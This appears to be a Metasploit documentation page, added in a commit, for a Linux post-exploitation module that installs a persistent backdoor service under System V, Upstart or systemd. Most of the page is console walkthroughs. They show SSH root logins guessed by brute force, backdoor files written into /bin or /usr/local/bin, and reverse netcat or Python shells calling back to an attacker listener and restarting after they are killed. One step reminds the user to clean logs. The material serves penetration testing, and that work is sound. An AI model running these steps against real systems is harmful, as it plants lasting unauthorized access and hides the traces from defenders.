|
| 1 | +### Creating A Testing Environment |
| 2 | + |
| 3 | + This module has been tested against: |
| 4 | + |
| 5 | +1. Kali 2.0 (System V) |
| 6 | +2. Ubuntu 14.04 (Upstart) |
| 7 | +3. Ubuntu 16.04 (systemd) |
| 8 | +4. Centos 5 (System V) |
| 9 | + |
| 10 | +## Verification Steps |
| 11 | + |
| 12 | + 1. Start msfconsole |
| 13 | + 2. Exploit a box via whatever method |
| 14 | + 4. Do: `use exploit/linux/local/service_persistence` |
| 15 | + 5. Do: `set session #` |
| 16 | + 6. Do: `set verbose true` |
| 17 | + 7. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system. |
| 18 | + 8. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system. |
| 19 | + 9. Do: `set lhost` |
| 20 | + 10. Do: `exploit` |
| 21 | + |
| 22 | +## Options |
| 23 | + |
| 24 | +**target** |
| 25 | + |
| 26 | + There are several targets selectable, which all have their own issues. |
| 27 | + |
| 28 | +0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries |
| 29 | +1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot). This logs to syslog or /var/log/<process>.log and .err |
| 30 | +2. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever. |
| 31 | +3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever. |
| 32 | + |
| 33 | +**SHELLPATH** |
| 34 | + |
| 35 | + If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin |
| 36 | + |
| 37 | +## Scenarios |
| 38 | + |
| 39 | +### System V (Centos 5 - root - chkconfig) |
| 40 | + |
| 41 | +Get initial access |
| 42 | + |
| 43 | + msf > use auxiliary/scanner/ssh/ssh_login |
| 44 | + msf auxiliary(ssh_login) > set rhosts 192.168.199.131 |
| 45 | + rhosts => 192.168.199.131 |
| 46 | + msf auxiliary(ssh_login) > set username root |
| 47 | + username => root |
| 48 | + msf auxiliary(ssh_login) > set password centos |
| 49 | + password => centos |
| 50 | + msf auxiliary(ssh_login) > exploit |
| 51 | + |
| 52 | + [*] 192.168.199.131:22 SSH - Starting bruteforce |
| 53 | + [+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux ' |
| 54 | + [*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400 |
| 55 | + [*] Scanned 1 of 1 hosts (100% complete) |
| 56 | + [*] Auxiliary module execution completed |
| 57 | + |
| 58 | +Install our callback service (system_v w/ chkconfig). Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services. |
| 59 | + |
| 60 | + msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence |
| 61 | + msf exploit(service_persistence) > set session 1 |
| 62 | + session => 1 |
| 63 | + msf exploit(service_persistence) > set verbose true |
| 64 | + verbose => true |
| 65 | + msf exploit(service_persistence) > set SHELLPATH /bin |
| 66 | + SHELLPATH => /bin |
| 67 | + msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat |
| 68 | + payload => cmd/unix/reverse_netcat |
| 69 | + msf exploit(service_persistence) > set lhost 192.168.199.128 |
| 70 | + lhost => 192.168.199.128 |
| 71 | + msf exploit(service_persistence) > exploit |
| 72 | + |
| 73 | + [*] Started reverse handler on 192.168.199.128:4444 |
| 74 | + [*] Writing backdoor to /bin/GUIJc |
| 75 | + [*] Max line length is 65537 |
| 76 | + [*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf |
| 77 | + [*] Utilizing System_V |
| 78 | + [*] Utilizing chkconfig |
| 79 | + [*] Writing service: /etc/init.d/HqdezBF |
| 80 | + [*] Max line length is 65537 |
| 81 | + [*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf |
| 82 | + [*] Enabling & starting our service |
| 83 | + [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400 |
| 84 | + |
| 85 | +Reboot the box to prove persistence |
| 86 | + |
| 87 | + reboot |
| 88 | + ^Z |
| 89 | + Background session 2? [y/N] y |
| 90 | + msf exploit(service_persistence) > use exploit/multi/handler |
| 91 | + msf exploit(handler) > set payload cmd/unix/reverse_netcat |
| 92 | + payload => cmd/unix/reverse_netcat |
| 93 | + msf exploit(handler) > set lhost 192.168.199.128 |
| 94 | + lhost => 192.168.199.128 |
| 95 | + msf exploit(handler) > exploit |
| 96 | + |
| 97 | + [*] Started reverse handler on 192.168.199.128:4444 |
| 98 | + [*] Starting the payload handler... |
| 99 | + [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400 |
| 100 | + |
| 101 | + |
| 102 | +### Upstart (Ubuntu 14.04.4 Server - root) |
| 103 | +Of note, I allowed Root login via SSH w/ password only to gain easy initial access |
| 104 | + |
| 105 | +Get initial access |
| 106 | + |
| 107 | + msf auxiliary(ssh_login) > exploit |
| 108 | + |
| 109 | + [*] 10.10.60.175:22 SSH - Starting bruteforce |
| 110 | + [+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux ' |
| 111 | + [*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400 |
| 112 | + [*] Scanned 1 of 1 hosts (100% complete) |
| 113 | + [*] Auxiliary module execution completed |
| 114 | + |
| 115 | +Install our callback service (Upstart) |
| 116 | + |
| 117 | + msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence |
| 118 | + msf exploit(service_persistence) > set session 1 |
| 119 | + session => 1 |
| 120 | + msf exploit(service_persistence) > set verbose true |
| 121 | + verbose => true |
| 122 | + msf exploit(service_persistence) > set payload cmd/unix/reverse_python |
| 123 | + payload => cmd/unix/reverse_python |
| 124 | + msf exploit(service_persistence) > set lhost 10.10.60.168 |
| 125 | + lhost => 10.10.60.168 |
| 126 | + msf exploit(service_persistence) > exploit |
| 127 | + |
| 128 | + [*] Started reverse handler on 10.10.60.168:4444 |
| 129 | + [*] Writing backdoor to /usr/local/bin/bmmjv |
| 130 | + [*] Max line length is 65537 |
| 131 | + [*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf |
| 132 | + [*] Utilizing Upstart |
| 133 | + [*] Writing /etc/init/Hipnufl.conf |
| 134 | + [*] Max line length is 65537 |
| 135 | + [*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf |
| 136 | + [*] Starting service |
| 137 | + [*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log |
| 138 | + [*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400 |
| 139 | + |
| 140 | +And now, we can kill the callback shell from our previous session |
| 141 | + |
| 142 | + ^Z |
| 143 | + Background session 5? [y/N] y |
| 144 | + msf exploit(service_persistence) > sessions -i 1 |
| 145 | + [*] Starting interaction with 1... |
| 146 | + |
| 147 | + netstat -antp | grep 4444 |
| 148 | + tcp 0 0 10.10.60.175:44368 10.10.60.168:4444 ESTABLISHED 1783/bash |
| 149 | + tcp 0 0 10.10.60.175:44370 10.10.60.168:4444 ESTABLISHED 1789/python |
| 150 | + kill 1783 |
| 151 | + [*] 10.10.60.175 - Command shell session 5 closed. Reason: Died from EOFError |
| 152 | + kill 1789 |
| 153 | + |
| 154 | +Now with a multi handler, we can catch Upstart restarting the process every 10sec |
| 155 | + |
| 156 | + msf > use exploit/multi/handler |
| 157 | + msf exploit(handler) > set payload cmd/unix/reverse_python |
| 158 | + payload => cmd/unix/reverse_python |
| 159 | + msf exploit(handler) > set lhost 10.10.60.168 |
| 160 | + lhost => 10.10.60.168 |
| 161 | + msf exploit(handler) > exploit |
| 162 | + |
| 163 | + [*] Started reverse handler on 10.10.60.168:4444 |
| 164 | + [*] Starting the payload handler... |
| 165 | + [*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400 |
| 166 | + |
| 167 | + |
| 168 | +### systemd (Ubuntu 16.04 Server - root) |
| 169 | +Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works. |
| 170 | +While python shellcode works on previous sytems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode. |
| 171 | + |
| 172 | +Get initial access |
| 173 | + |
| 174 | + msf exploit(handler) > use exploit/linux/local/service_persistence |
| 175 | + msf exploit(service_persistence) > set session 1 |
| 176 | + session => 1 |
| 177 | + msf exploit(service_persistence) > set verbose true |
| 178 | + verbose => true |
| 179 | + msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat |
| 180 | + payload => cmd/unix/reverse_netcat |
| 181 | + msf exploit(service_persistence) > set lhost 192.168.199.128 |
| 182 | + lhost => 192.168.199.128 |
| 183 | + msf exploit(service_persistence) > exploit |
| 184 | + |
| 185 | + [*] Started reverse handler on 192.168.199.128:4444 |
| 186 | + [*] Writing backdoor to /usr/local/bin/JSRCF |
| 187 | + [*] Max line length is 65537 |
| 188 | + [*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf |
| 189 | + [*] Utilizing systemd |
| 190 | + [*] /lib/systemd/system/YelHpCx.service |
| 191 | + [*] Max line length is 65537 |
| 192 | + [*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf |
| 193 | + [*] Enabling service |
| 194 | + [*] Starting service |
| 195 | + [*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400 |
| 196 | + |
| 197 | + ^Z |
| 198 | + Background session 7? [y/N] y |
| 199 | + |
| 200 | +Kill the process on the Ubuntu target box via local access #good_admin |
| 201 | + |
| 202 | + root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444 |
| 203 | + tcp 0 0 192.168.199.130:47052 192.168.199.128:4444 ESTABLISHED 5632/nc |
| 204 | + root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632 |
| 205 | + |
| 206 | +And logically, we lose our shell |
| 207 | + |
| 208 | + [*] 192.168.199.130 - Command shell session 7 closed. Reason: Died from EOFError |
| 209 | + |
| 210 | +Now with a multi handler, we can catch systemd restarting the process every 10sec |
| 211 | + |
| 212 | + |
| 213 | + msf exploit(service_persistence) > use exploit/multi/handler |
| 214 | + msf exploit(handler) > show options |
| 215 | + |
| 216 | + Module options (exploit/multi/handler): |
| 217 | + |
| 218 | + Name Current Setting Required Description |
| 219 | + ---- --------------- -------- ----------- |
| 220 | + |
| 221 | + Payload options (cmd/unix/reverse_netcat): |
| 222 | + |
| 223 | + Name Current Setting Required Description |
| 224 | + ---- --------------- -------- ----------- |
| 225 | + LHOST 192.168.199.128 yes The listen address |
| 226 | + LPORT 4444 yes The listen port |
| 227 | + |
| 228 | + Exploit target: |
| 229 | + |
| 230 | + Id Name |
| 231 | + -- ---- |
| 232 | + 0 Wildcard Target |
| 233 | + |
| 234 | + msf exploit(handler) > exploit |
| 235 | + |
| 236 | + [*] Started reverse handler on 192.168.199.128:4444 |
| 237 | + [*] Starting the payload handler... |
| 238 | + [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400 |
0 commit comments